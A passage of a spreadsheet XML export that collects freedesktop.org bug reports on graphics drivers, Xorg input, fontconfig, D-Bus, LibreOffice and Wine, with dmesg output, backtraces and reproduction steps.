    <t>MESA-105318</t>
  </si>
  <si>
    <t>[kbl] GPU HANG: ecode 9:0:0xfffffffe in Compositor (Gnome!)</t>
  </si>
  <si>
    <t>Created attachment 137734
gpu crash dump
While trying to debug #104064 I came across a gpu hang issue. Dmesg output instructed me to open a new bug here so that's what I'm doing. The gpu crash dump is attached here dmesg and lspci follow.
I have seen #104545 and my linux-firmware does include the patch mentioned there however the bug is still happening.</t>
  </si>
  <si>
    <t>XORG-42399</t>
  </si>
  <si>
    <t>Input/joystick</t>
  </si>
  <si>
    <t>Popular gamepads (Xbox 360 controller and PS3 controller) are not working properly.</t>
  </si>
  <si>
    <t>What I've expected:
Controller should appear as XI2 device but not attached to core devices (pointer/keyboard) should just pass kernel input events through.
Reading kernel input devices directly is usually not an option for application as device permissions don't allow that.
What I've got:
Controller is affecting mouse badly. In case of Xbox 360 controller mouse is stuck in top left corner of the screen as soon as I've touched a stick on controller. In case of PS3 controller mouse doesn't go crazy but it moves rectangular I cannot perform a circle motion by turning controller's stick around.
Why that's important:
To make games a better story on X11.</t>
  </si>
  <si>
    <t>MadFishTheOne</t>
  </si>
  <si>
    <t>DRI-87632</t>
  </si>
  <si>
    <t>[PNV] testdisplay -f causes  *ERROR* mismatch in gmch_pfit.lvds_border_bits (expected 32768 found 0)</t>
  </si>
  <si>
    <t>Created attachment 111213
dmesg
==System Environment==
--------------------------
Regression: No.I fail to find a good commit. Tried drm-intel-testing 2014-08-09 commit 0c6aad835dd1b817e87e312da0350e07952ff25e
Non-working platforms: Pineview(test machine: x-pnv1)
==kernel==
--------------------------
3.18.0 commit b2776bf7149bddd1f4161f14f79520f17fc1d71d
==Bug detailed description==
-----------------------------
Running ./testdisplay -f 38.258008329121024600603607624 and exit with CTRL-C dmesg shows WARNING:
[  242.655524] WARNING: CPU: 0 PID: 3685 at drivers/gpu/drm/i915/intel_display.c:10968 check_crtc_state+0x9a9/0x9ff [i915]()
==Reproduce steps==
---------------------------- 
1. ./testdisplay -f 38.258008329121024600603607624
2. CTRL-C to exit
3. dmesg |grep WARNING</t>
  </si>
  <si>
    <t>jeff.zheng</t>
  </si>
  <si>
    <t>UIM-2434</t>
  </si>
  <si>
    <t>pixmaps and data/icons directories should be unified</t>
  </si>
  <si>
    <t>pixmaps and data/icons directories should be unified.</t>
  </si>
  <si>
    <t>TELEPATHY-57267</t>
  </si>
  <si>
    <t>Interface.FileTransfer.Metadata not fully implemented in gabble</t>
  </si>
  <si>
    <t>The properties for the org.freedesktop.Telepathy.Channel.Interface.FileTransfer.Metadata are implemented and can be requested when creating a file transfer and they are correctly sent to the other side but the interface itself is registered on DBus.
Checking with d-feet it is possible to get the properties using o.f.DBus.Properties get/getAll but the interface is not shown.</t>
  </si>
  <si>
    <t>daniele.domenichelli</t>
  </si>
  <si>
    <t>XORG-1095</t>
  </si>
  <si>
    <t>Display glitch under xcompmgr in xmms plugin</t>
  </si>
  <si>
    <t>See the PNG in the URL.  That's xmms' Simple Spectrum Analyzer plugin under
xcompmgr.  Note the offset on both axes.  This happens under all four xcompmgr
modes so it's most likely a server bug.
The offset is 100 pixels in the Y direction and 5 in the X direction.  Note the
wrapping occurs for both axes though the screenshot only shows it for the X axis.</t>
  </si>
  <si>
    <t>DRI-65197</t>
  </si>
  <si>
    <t>[HSW Bisected][drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Arch:           x86_64
Platform:       Haswell
Kernel: (drm-intel-next-queued)c886979ca47fcdcec95a288c8f119510b1be5469
Bug detailed description:
-------------------------
Run ./drm_vma_limiter_cached  dmesg has [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted.
When run following cases also have this issue:
igt/drm_vma_limiter_gtt
igt/gem_cpu_concurrent_blit/gpu-read-after-write
igt/gem_cpu_concurrent_blit/overwrite-source
igt/gem_cpu_reloc
igt/gem_cs_prefetch
igt/gem_cs_tlb/blt
igt/gem_cs_tlb/bsd
igt/gem_cs_tlb/render
igt/gem_ctx_bad_exec
igt/gem_ctx_basic
igt/gem_ctx_exec
igt/gem_double_irq_loop
igt/gem_dummy_reloc_loop/blt
igt/gem_dummy_reloc_loop/bsd
igt/gem_dummy_reloc_loop/mixed
igt/gem_dummy_reloc_loop/render
igt/gem_exec_bad_domains/cpu-domain
igt/gem_exec_bad_domains/double-write-domain
igt/gem_exec_bad_domains/gtt-domain
igt/gem_exec_bad_domains/invalid-gpu-domain
igt/gem_exec_big
igt/gem_exec_blt
igt/gem_exec_lut_handle
igt/gem_exec_nop/blt
igt/gem_exec_nop/bsd
igt/gem_exec_nop/render
igt/gem_fenced_exec_thrash
igt/gem_fence_thrash/bo-write-verify-none
igt/gem_fence_thrash/bo-write-verify-x
igt/gem_flink/basic
igt/gem_flink/double-flink
igt/gem_flink/flink-lifetime
igt/gem_gtt_concurrent_blit/early-read
igt/gem_gtt_concurrent_blit/overwrite-source
igt/gem_hangcheck_forcewake
igt/gem_largeobject
igt/gem_linear_blits
igt/gem_lut_handle
igt/gem_mmap_gtt/write
igt/gem_mmap_offset_exhaustion
igt/gem_partial_pwrite_pread/reads
igt/gem_partial_pwrite_pread/writes
igt/gem_partial_pwrite_pread/writes-after-reads
igt/gem_pin
igt/gem_pipe_control_store_loop
igt/gem_pwrite
igt/gem_reg_read
igt/gem_reloc_vs_gpu
igt/gem_render_linear_blits
igt/gem_render_tiled_blits
igt/gem_ringfill/blitter
igt/gem_ringfill/render
igt/gem_ring_sync_loop
igt/gem_seqno_wrap
igt/gem_set_tiling_vs_blt/tiled-to-tiled
igt/gem_set_tiling_vs_blt/tiled-to-untiled
igt/gem_set_tiling_vs_blt/untiled-to-tiled
igt/gem_storedw_batches_loop
igt/gem_storedw_loop_blt
igt/gem_storedw_loop_bsd
igt/gem_storedw_loop_render
igt/gem_tiled_blits
igt/gem_tiled_fence_blits
igt/gem_tiled_partial_pwrite_pread/reads
igt/gem_tiled_partial_pwrite_pread/writes
igt/gem_tiled_partial_pwrite_pread/writes-after-reads
igt/gem_tiled_pread
igt/gem_tiled_swapping
igt/gem_tiling_max_stride
igt/gem_unfence_active_buffers
igt/gem_unref_active_buffers
igt/gem_wait_render_timeout
igt/getstats
igt/kms_flip/delayed-flip-vs-dpms
igt/kms_flip/delayed-flip-vs-panning
igt/kms_flip/flip-vs-absolute-wf_vblank
igt/kms_flip/flip-vs-dpms
igt/kms_flip/flip-vs-dpms-off-vs-modeset
igt/kms_flip/flip-vs-modeset
igt/kms_flip/plain-flip-fb-recreate
igt/kms_flip/single-buffer-flip-vs-dpms-off-vs-modeset
igt/kms_flip/wf_vblank-vs-dpms
igt/kms_flip/wf_vblank-vs-modeset
igt/module_reload
igt/prime_self_import/with_two_bos
igt/testdisplay
Bisect shows:
22aae764a3fa21ee502b99e8986cb4e49ec14cfe is the first bad commit
commit 22aae764a3fa21ee502b99e8986cb4e49ec14cfe
Author:     Ben Widawsky 
AuthorDate: Tue May 28 19:22:24 2013 -0700
Commit:     Daniel Vetter 
CommitDate: Wed May 29 21:19:11 2013 +0200
    drm/i915: Create a more generic pm handler for hsw+
    HSW has some special requirements for the VEBOX. Splitting out the
    interrupt handler will make the code a bit nicer and less error prone
    when we begin to handle those.
    The slight functional change in this patch (queueing work while holding
    the spinlock) is intentional as it makes a subsequent patch a bit nicer.
    The change should also only effect HSW platforms.
    Reviewed-by: Damien Lespiau 
    Signed-off-by: Ben Widawsky 
    [danvet: move the queue_work out of the spinlock again.]
    Signed-off-by: Daniel Vetter 
dmesg:
[   37.719785] [drm:i915_driver_open]
[   37.719797] [drm:intel_crtc_set_config] [CRTC:3] [NOFB]
[   37.719801] [drm:intel_crtc_set_config] [CRTC:5] [NOFB]
[   37.719802] [drm:intel_crtc_set_config] [CRTC:7] [NOFB]
[   37.719805] [drm:i915_driver_open]
[   37.719832] [drm:i915_getparam] Unknown parameter 22
[   37.719946] [drm:i915_getparam] Unknown parameter 22
[   37.804527] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.315209] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.347630] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.412516] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.509595] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.574380] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.671577] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.736392] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.833891] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.931013] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   38.995697] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.028196] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.093471] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.190957] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.255942] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.353898] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.418944] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.451447] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.516462] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.613935] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.678898] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.776729] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.841703] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.906728] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   39.918886] [drm:intel_crtc_set_config] [CRTC:3] [NOFB]
[   39.918891] [drm:intel_crtc_set_config] [CRTC:5] [NOFB]
[   39.918893] [drm:intel_crtc_set_config] [CRTC:7] [NOFB]
[   39.918915] [drm:i915_driver_open]
[   39.918919] [drm:intel_crtc_set_config] [CRTC:3] [NOFB]
[   39.918920] [drm:intel_crtc_set_config] [CRTC:5] [NOFB]
[   39.918921] [drm:intel_crtc_set_config] [CRTC:7] [NOFB]
[   39.918924] [drm:i915_driver_open]
[   39.918949] [drm:i915_getparam] Unknown parameter 22
[   40.288303] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   40.288353] [drm:intel_crtc_set_config] [CRTC:3] [NOFB]
[   40.288355] [drm:intel_crtc_set_config] [CRTC:5] [NOFB]
[   40.288357] [drm:intel_crtc_set_config] [CRTC:7] [NOFB]
[   42.715457] [drm:hsw_pm_irq_handler] *ERROR* Unexpected PM interrupted
[   62.124839] NET: Registered protocol family 10
Reproduce steps:
----------------
1. ./drm_vma_limiter_cached
2. dmesg -r | egrep  |grep drm</t>
  </si>
  <si>
    <t>XORG-3775</t>
  </si>
  <si>
    <t>[BROKEN_BUG] Missing HORIZONTAL ELLIPSIS from Compose maps</t>
  </si>
  <si>
    <t>In the lib/X11/locale tree there are no Multi_key definitions for HORIZONTAL
ELLIPSIS U2026.
Now I know there are some keyboards that ship with an ellipsis key but I don't
have one.  So it would be good to have a Multi_key combination that does this. 
I suggest that    be used as this is easy to type on
most keyboards requiring four keystrokes at most.</t>
  </si>
  <si>
    <t>SWFDEC-15471</t>
  </si>
  <si>
    <t>segmentation fault while seeking in youtube.com</t>
  </si>
  <si>
    <t>Latest git with pulseaudio backend
How to reproduce: move the seeking cursor while playing a video in youtube.com
(gecko:9091): Swfdec-CRITICAL **: swfdec_flv_decoder_get_video: assertion `SWFDEC_IS_FLV_DECODER (flv)' failed
SWFDEC: WARN : swfdec_codec_video.c(116): swfdec_video_decoder_new: no decoder found for codec 0
(gecko:9091): Swfdec-CRITICAL **: swfdec_flv_decoder_get_video: assertion `SWFDEC_IS_FLV_DECODER (flv)' failed
SWFDEC: WARN : swfdec_codec_video.c(116): swfdec_video_decoder_new: no decoder found for codec 0
(gecko:9091): Swfdec-CRITICAL **: swfdec_flv_decoder_get_video: assertion `SWFDEC_IS_FLV_DECODER (flv)' failed
SWFDEC: WARN : swfdec_codec_video.c(116): swfdec_video_decoder_new: no decoder found for codec 0
[...]
SWFDEC: ERROR: swfdec_stream.c(373): swfdec_stream_errorv: error in stream for http://sjc-v55.sjc.youtube.com/get_video?video_id=Sj1VauyjkI4&amp;signature=02D9BE969612AD14D7EE15A28E694F9F3DC4CDF9.24BCA8A67DEBB24E58395F490ADCE7590FC9B42C&amp;ip=84.222.72.72&amp;ipbits=16&amp;expire=1208048540&amp;key=yt1&amp;sver=2: User interrupt
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb7070720 (LWP 9091)]
0xb74c1731 in g_object_unref () from /usr/lib/libgobject-2.0.so.0
(gdb) bt full
#0  0xb74c1731 in g_object_unref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#1  0xb22992d7 in swfdec_net_stream_seek (stream=0xb865100 
    secs=88.966131907308394) at swfdec_net_stream.c:710
	first = 
	last = 
	msecs = 
	__PRETTY_FUNCTION__ = swfdec_net_stream_seek
#2  0xb229ac52 in swfdec_net_stream_do_seek (cx=0xa846980 obj=0xb865100 
    argc=1 argv=0xc8973c8 rval=0xbfcc66b0) at swfdec_net_stream_as.c:139
	d = 88.966131907308394
#3  0xb225b55c in swfdec_as_context_run (context=0xa846980)
    at swfdec_as_context.c:887
	argv = (SwfdecAsValue *) 0xc8973c8
	native = (SwfdecAsNativeFunction *) 0xab80228
	rval = {type = SWFDEC_AS_TYPE_UNDEFINED value = {boolean = 0 
    number = 0 string = 0x0 object = 0x0}}
	frame = (SwfdecAsFrame *) 0xdce4670
	last_frame = (SwfdecAsFrame *) 0x0
	spec = (const SwfdecActionSpec *) 0xb230bd30
	startpc = (const guint8 *) 0xb15cd08 CWS\aï¿½\206\001
	pc = 
	endpc = (const guint8 *) 0xb1753de 
---Type  to continue or q  to quit---
	nextpc = (const guint8 *) 0xb170edc \027\226\r
	exitpc = (const guint8 *) 0xb170f0d O\226\004
	check = (SwfdecAsValue *) 0x0
	action = 82
	len = 0
	data = (const guint8 *) 0x0
	original_version = 4294967295
	step = (void (*)(SwfdecAsDebugger * SwfdecAsContext *)) 0
	check_block = 1
	__PRETTY_FUNCTION__ = swfdec_as_context_run
#4  0xb226cfaf in swfdec_as_object_call (object=0xb1faf38 
    name=0xb22e39fd onEnterFrame argc=0 argv=0x0 return_value=0xbfcc66f0)
    at swfdec_as_object.c:1254
	tmp = {type = SWFDEC_AS_TYPE_UNDEFINED value = {boolean = 200754576 
    number = 9.9185939247025613e-316 string = 0xbf74590 È±\020\n\001 
    object = 0xbf74590}}
	fun = (SwfdecAsFunction *) 0xbf74590
	__PRETTY_FUNCTION__ = swfdec_as_object_call
#5  0xb2254ef9 in swfdec_actor_execute (actor=0xb1faf38 
    condition=SWFDEC_EVENT_ENTER) at swfdec_actor.c:242
	thisp = (SwfdecAsObject *) 0xb1faf38
	name = 0xb22e39fd onEnterFrame
	version = 7
---Type  to continue or q  to quit---
	__PRETTY_FUNCTION__ = swfdec_actor_execute
#6  0xb22a0973 in swfdec_player_perform_actions (player=0xa846980)
    at swfdec_player.c:520
	__PRETTY_FUNCTION__ = swfdec_player_perform_actions
#7  0xb22a4c2c in swfdec_player_iterate (timeout=0xa846bc8)
    at swfdec_player.c:1661
	priv = (SwfdecPlayerPrivate *) 0xa846a40
	player = (SwfdecPlayer *) 0xa846980
	walk = (GList *) 0x0
	__PRETTY_FUNCTION__ = swfdec_player_iterate
#8  0xb22a361e in swfdec_player_do_advance (player=0xa846980 msecs=40 
    audio_samples=1764) at swfdec_player.c:1720
	priv = (SwfdecPlayerPrivate *) 0xa846a40
	timeout = (SwfdecTimeout *) 0xa846bc8
	target_time = 18976011264
	__PRETTY_FUNCTION__ = swfdec_player_do_advance
#9  0xb22da50d in swfdec_marshal_VOID__ULONG_UINT (closure=0xa8442c8 
    return_value=0x0 n_param_values=3 param_values=0xbfcc6b74 
    invocation_hint=0xbfcc6a7c marshal_data=0xb22a3490)
    at swfdec_marshal.c:285
	data1 = (gpointer) 0xa846980
	data2 = 
	__PRETTY_FUNCTION__ = swfdec_marshal_VOID__ULONG_UINT
(gdb) p swfdec_net_stream_seek::stream-&gt;decoder.codec
$2 = 2</t>
  </si>
  <si>
    <t>FONTCONFIG-48573</t>
  </si>
  <si>
    <t>platform without regex do not have also REG_XXX defines</t>
  </si>
  <si>
    <t>Created attachment 59821
proposed fix
while building on mingw I've noticed the fcstr.c does not compile because even if _FcStrRegexCmp has ifdef the calls are using REG_XXX defines
I've made a patch that defines _FcStrRegexCmp as a macro when regex is not found so it will eat the arguments</t>
  </si>
  <si>
    <t>sherpya</t>
  </si>
  <si>
    <t>MESA-31516</t>
  </si>
  <si>
    <t>Crash while running Wine D3D9 tests with an Intel GM45</t>
  </si>
  <si>
    <t>Created attachment 40171
glxinfo
When I try to run d3d9 visual test i'm getting this crash:
Backtrace:
=&gt;0 0x4030b2bb intel_region_reference+0x2b(dst=0x7db7f6e8 src=0x80) [/build/buildd/mesa-7.10.0+git20101108.ef6967dd/build/dri/src/mesa/drivers/dri/i965/intel_regions.c:268] in i965_dri.so (0x0033f048)
  1 0x4033e2dc brw_set_draw_region+0x8b(intel=0x7db69a30 color_regions=0x33f090 depth_region=(nil) num_color_regions=0x0001) [/build/buildd/mesa-7.10.0+git20101108.ef6967dd/build/dri/src/mesa/drivers/dri/i965/brw_vtbl.c:136] in i965_dri.so (0x0033f0c8)
  2 0x402ff594 intel_draw_buffer+0x1a3(ctx=0x7db69a30 fb=0x7e88fc20) [/build/buildd/mesa-7.10.0+git20101108.ef6967dd/build/dri/src/mesa/drivers/dri/i965/intel_buffers.c:232] in i965_dri.so (0x0033f108)
  3 0x40300d5e intel_prepare_render+0x5d(intel=0x7db69a30) [/build/buildd/mesa-7.10.0+git20101108.ef6967dd/build/dri/src/mesa/drivers/dri/i965/intel_context.c:440] in i965_dri.so (0x0033f1b8)
  4 0x40317189 intelTexSubimage+0x98(ctx=0x7db69a30 dims= target=0x0de1 level=0 xoffset=0 yoffset=0 zoffset=0 width=0x0010 height=0x0010 depth=0x0001 imageSize=0 format=0x80e1 type=0x8367 pixels=0x174ac0 packing=0x7db78700 texObj=0x7e87e6d8 texImage=0x7e9214f0 compressed=0) [/build/buildd/mesa-7.10.0+git20101108.ef6967dd/build/dri/src/mesa/drivers/dri/i965/intel_tex_subimage.c:78] in i965_dri.so (0x0033f208)
  5 0x40317846 intelTexSubImage2D+0x85(ctx=0x7db69a30 target=0x0de1 level=0 xoffset=0 yoffset=0 width=0x0010 height=0x0010 format=0x80e1 type=0x8367 pixels=0x174ac0 packing=0x7db78700 texObj=0x7e87e6d8 texImage=0x7e9214f0) [/build/buildd/mesa-7.10.0+git20101108.ef6967dd/build/dri/src/mesa/drivers/dri/i965/intel_tex_subimage.c:223] in i965_dri.so (0x0033f278)
  6 0x403e0053 _mesa_TexSubImage2D+0x232(target=0x0de1 level=0 xoffset=0 yoffset=0 width=0x0010 height=0x0010 format=0x80e1 type=0x8367 pixels=0x174ac0) [/build/buildd/mesa-7.10.0+git20101108.ef6967dd/build/dri/src/mesa/main/teximage.c:2778] in i965_dri.so (0x0033f3b8)
  7 0x400d279d surface_load_location+0xa0c(surface=0x174970 flag=0x0080 rect=(nil)) [/home/jaime/wine-git/dlls/wined3d/surface.c:758] in wined3d (0x0033f3f8)
  8 0x400d5cc9 IWineD3DSurfaceImpl_LoadTexture+0x68(iface=0x174970 srgb_mode=0x0001) [/home/jaime/wine-git/dlls/wined3d/surface.c:2505] in wined3d (0x0033f458)
  9 0x400e7a3e texture_internal_preload+0xbd(iface=0x174840 srgb=SRGB_SRGB) [/home/jaime/wine-git/dlls/wined3d/texture.c:93] in wined3d (0x0033f488)
  10 0x4004fc25 device_preload_textures+0x134(device=0x12c5b8) [/home/jaime/wine-git/dlls/wined3d/device.c:463] in wined3d (0x0033f4e8)
  11 0x4003ffdd context_apply_draw_state+0x2c(context=0x146f28 device=0x12c5b8) [/home/jaime/wine-git/dlls/wined3d/context.c:2161] in wined3d (0x0033f798)
  12 0x40070c85 drawPrimitive+0x414(iface=0x12c5b8 index_count=0x0004 StartIdx=0 idxSize=0 idxData=0x0(nil)) [/home/jaime/wine-git/dlls/wined3d/drawprim.c:597] in wined3d (0x0033f7e8)
  13 0x40051a40 IWineD3DDeviceImpl_DrawPrimitiveUP+0xbf(iface=0x12c5b8 vertex_count=0x0004 pVertexStreamZeroData=0x33fb0c VertexStreamZeroStride=0x0014) [/home/jaime/wine-git/dlls/wined3d/device.c:4883] in wined3d (0x0033f848)
  14 0x68cf5cad IDirect3DDevice9Impl_DrawPrimitiveUP+0xbc(iface=0x129cd0 PrimitiveType=D3DPT_TRIANGLESTRIP PrimitiveCount=0x0002 pVertexStreamZeroData=0x33fb0c VertexStreamZeroStride=0x0014) [/home/jaime/wine-git/dlls/d3d9/device.c:1950] in d3d9 (0x0033fd28)
  15 0x686de701 func_visual+0x76d0() [/home/jaime/wine-git/dlls/d3d9/tests/visual.c:6506] in d3d9_test (0x0033fd78)
  16 0x686e0124 run_test+0x143(name=visual.c) [/home/jaime/wine-git/dlls/d3d9/tests/../../../include/wine/test.h:556] in d3d9_test (0x0033fe48)
  17 0x686e0bf2 main+0x161(argc=0 argv=0x1) [/home/jaime/wine-git/dlls/d3d9/tests/../../../include/wine/test.h:624] in d3d9_test (0x0033fe90)
  18 0x686e0dcc __wine_spec_exe_entry+0x7b(peb=0x7ffdf000) [/home/jaime/wine-git/dlls/winecrt0/exe_entry.c:36] in d3d9_test (0x0033fea8)
  19 0x7b85604c call_process_entry+0xb() in kernel32 (0x0033fee8)
  20 0x7b856cef start_process+0x5e(peb=0x7ffdf000) [/home/jaime/wine-git/dlls/kernel32/process.c:994] in kernel32 (0x0033fef8)
  21 0x7bc71760 call_thread_func+0xb() in ntdll (0x0033ffc8)
  22 0x7bc74300 call_thread_entry_point+0x6f(entry=0x7b856c90 arg=0x7ffdf000) [/home/jaime/wine-git/dlls/ntdll/signal_i386.c:2473] in ntdll (0x0033ffe8)
  23 0x7bc49c2a start_process+0x29(kernel_start=0x7b856c90) [/home/jaime/wine-git/dlls/ntdll/loader.c:2610] in ntdll (0x00000000)
make: *** [visual.ok] Error 5
Also there's a lot of this messages:
Render to texture BAD FORMAT MESA_FORMAT_L8
software rendering renderbuffer
Render to texture BAD FORMAT MESA_FORMAT_SL8
Finish render texture tid 682f06c0 tex=23
Render to texture BAD FORMAT MESA_FORMAT_SL8
software rendering renderbuffer
Finish render texture tid 682f06c0 tex=23
Render to texture BAD FORMAT MESA_FORMAT_AL88
software rendering renderbuffer
Render to texture BAD FORMAT MESA_FORMAT_SLA8
Finish render texture tid 682f06c0 tex=24
Render to texture BAD FORMAT MESA_FORMAT_SLA8
software rendering renderbuffer
Finish render texture tid 682f06c0 tex=24
Render to texture BAD FORMAT MESA_FORMAT_AL88
software rendering renderbuffer
Finish render texture tid 682f06c0 tex=25
Render to texture BAD FORMAT MESA_FORMAT_L8
software rendering renderbuffer
Finish render texture tid 682f06c0 tex=26
I'm using Mesa 7.10 dev from Xorg-edgers and wine-1.3.6-335-gd5fa2ce
Ubuntu 10.10</t>
  </si>
  <si>
    <t>FONTCONFIG-8307</t>
  </si>
  <si>
    <t>fontconfig.def.in is bogus</t>
  </si>
  <si>
    <t>the file fontconfig.def.in supplied with FC 2.4.1 references several functions
that (no longer?) exist. Suggestion: generate this file before distribution see
python script attached.
Cannot export FcCacheBankToIndexMTF: symbol not defined
Cannot export FcCacheFindBankDir: symbol not defined
Cannot export FcCacheRead: symbol not defined
Cannot export FcCharSetDistributeBytes: symbol not defined
Cannot export FcCharSetNeededBytes: symbol not defined
Cannot export FcCharSetNeededBytesAlign: symbol not defined
Cannot export FcCharSetNewBank: symbol not defined
Cannot export FcCharSetThawAll: symbol not defined
Cannot export FcCharSetUnserialize: symbol not defined
Cannot export FcConfigNormalizeFontDir: symbol not defined
Cannot export FcConfigSetCache: symbol not defined
Cannot export FcDirCacheHasCurrentArch: symbol not defined
Cannot export FcFontSetDistributeBytes: symbol not defined
Cannot export FcFontSetNeededBytes: symbol not defined
Cannot export FcFontSetNeededBytesAlign: symbol not defined
Cannot export FcFontSetNewBank: symbol not defined
Cannot export FcFontSetUnserialize: symbol not defined
Cannot export FcGlobalCacheCreate: symbol not defined
Cannot export FcGlobalCacheDestroy: symbol not defined
Cannot export FcGlobalCacheLoad: symbol not defined</t>
  </si>
  <si>
    <t>LIBREOFFICE-41580</t>
  </si>
  <si>
    <t>calc dropping enties from .cvs file when importing</t>
  </si>
  <si>
    <t>SeaMonkey Bug:
https://bugzilla.mozilla.org/show_bug.cgi?id=687290
exported file in csv format from seamonkey addressbook. cvs file has all entries when exported. Right name all data and all contacts that existed. 
should export all contacts to the file selected including the new ones that were added since last export of all contacts. 
openSUSE 11.4 with KDE 4.7.1 Release 8
SeaMonkey Version 2.4
User Agent Mozilla/5.0 (X11 Linux x86_64 rv:7.0) Gecko/20110912 Firefox/7.0  SeaMonkey/2.4
LibreOffice spreadsheet is 3.4.2 from openSUSE repo.
                        is 3.4.3 from LibreOffice web site.
1. Yesterday(SeaMonkey) I deleted all old version of the exported .csv's of my personal addressbook. I then went to addressbook personal addressbook checked new contacts were their then selected Tools --&gt; Export.
2.Selected the folder to export to named the file and changed LDIF to Comma separated. Then Saved the file.
3. opened the file in LibreOffice (3.4.3) spreadsheet got text inport window for .csv imported it.  Then did find on the three names. One was there because it was there before upgrades and was just an email address change but the other two were not there at all both added after upgrades.
I hate to attach spreadsheet since it has a lot of personal information that I do not have permission to release.
Did some additional testing and problems appears to be in the LibreOffice spreadsheet. If I open the .csv with koffice2-kspread or gnumeric the missing contacts are there. If I open it with kwrite they are there. If I try lilberoffice-calc they do not appear. 
Thanks for your help.
Russ
openSUSE 11.4 with KDE 4.7.1 Release 8
SeaMonkey Version 2.4
User Agent Mozilla/5.0 (X11 Linux x86_64 rv:7.0) Gecko/20110912 Firefox/7.0  SeaMonkey/2.4
openSUSE 11.4(2.6.37.6-0.7-desktop)|KDE Platform Version 4.7.1 (4.7.1) release 8|Intel core2duo 2.5 MHZ|8GB DDR3|GeForce 8400GS (NVIDIA-Linux-x86_64-280.13)</t>
  </si>
  <si>
    <t>upscope</t>
  </si>
  <si>
    <t>DBUS-50740</t>
  </si>
  <si>
    <t>py3dbus is downcasting the ObjectPaths to signature 's' when the server is advertising 'o'</t>
  </si>
  <si>
    <t>TEST CASE
1. Start an installation with Ubiquity on Hardware without wired connection and with a Wifi Card
2. Proceed to Wireless setup page
3. Select a network
4. Enter password
5. Click on 'Connect'
ACTUAL RESULT:
Crash below
WORKAROUND:
Setup the Wifi connection from network-manager before starting Ubiquity
Jun 5 07:59:45 ubuntu ubiquity[3109]: Step_before = stepPrepare
Jun 5 07:59:45 ubuntu ubiquity[3109]: switched to page wireless
Jun 5 08:00:19 ubuntu ubiquity[3109]: Exception in GTK frontend (invoking crash handler):
Jun 5 08:00:19 ubuntu ubiquity[3109]: Traceback (most recent call last):
Jun 5 08:00:19 ubuntu ubiquity[3109]: File /usr/lib/ubiquity/ubiquity/frontend/gtk_ui.py line 1328 in on_next_clicked
Jun 5 08:00:19 ubuntu ubiquity[3109]: if ui.plugin_on_next_clicked():
Jun 5 08:00:19 ubuntu ubiquity[3109]: File /usr/lib/ubiquity/plugins/ubi-wireless.py line 134 in plugin_on_next_clicked
Jun 5 08:00:19 ubuntu ubiquity[3109]: self.nmwidget.connect_to_ap()
Jun 5 08:00:19 ubuntu ubiquity[3109]: File /usr/lib/ubiquity/ubiquity/nm.py line 443 in connect_to_ap
Jun 5 08:00:19 ubuntu ubiquity[3109]: self.view.connect_to_selection(passphrase)
Jun 5 08:00:19 ubuntu ubiquity[3109]: File /usr/lib/ubiquity/ubiquity/nm.py line 384 in connect_to_selection
Jun 5 08:00:19 ubuntu ubiquity[3109]: self.wifi_model.connect_to_ap(model[parent][0] ssid passphrase)
Jun 5 08:00:19 ubuntu ubiquity[3109]: File /usr/lib/ubiquity/ubiquity/nm.py line 126 in connect_to_ap
Jun 5 08:00:19 ubuntu ubiquity[3109]: obj dbus.ObjectPath(device) dbus.ObjectPath(saved_path))[1]
Jun 5 08:00:19 ubuntu ubiquity[3109]: File /usr/lib/python3/dist-packages/dbus/proxies.py line 145 in __call__
Jun 5 08:00:19 ubuntu ubiquity[3109]: **keywords)
Jun 5 08:00:19 ubuntu ubiquity[3109]: File /usr/lib/python3/dist-packages/dbus/connection.py line 651 in call_blocking
Jun 5 08:00:19 ubuntu ubiquity[3109]: message timeout)
Jun 5 08:00:19 ubuntu ubiquity[3109]: dbus.exceptions.DBusException: org.freedesktop.DBus.Error.UnknownMethod: Method AddAndActivateConnection with signature a{sa{sv}}ss on interface (null) doesn't exist
Jun 5 08:00:19 ubuntu ubiquity[3109]:
Jun 5 08:00:19 ubuntu ubiquity[3109]:
Jun 5 08:00:20 ubuntu ubiquity[3109]: log-output -t ubiquity /usr/share/apport/apport-gtk</t>
  </si>
  <si>
    <t>marconifabio</t>
  </si>
  <si>
    <t>XORG-4164</t>
  </si>
  <si>
    <t>Xterm breaks non-latin chars in clipboard</t>
  </si>
  <si>
    <t>After copying into clipboard non-latin chars (I've tested only with Lithuanian)
and scrolling a document (or closing/opening new one) after pasting they become
replaced by '#' char.
Let's say I have 3 line terminal. On first line I write some chars copy them
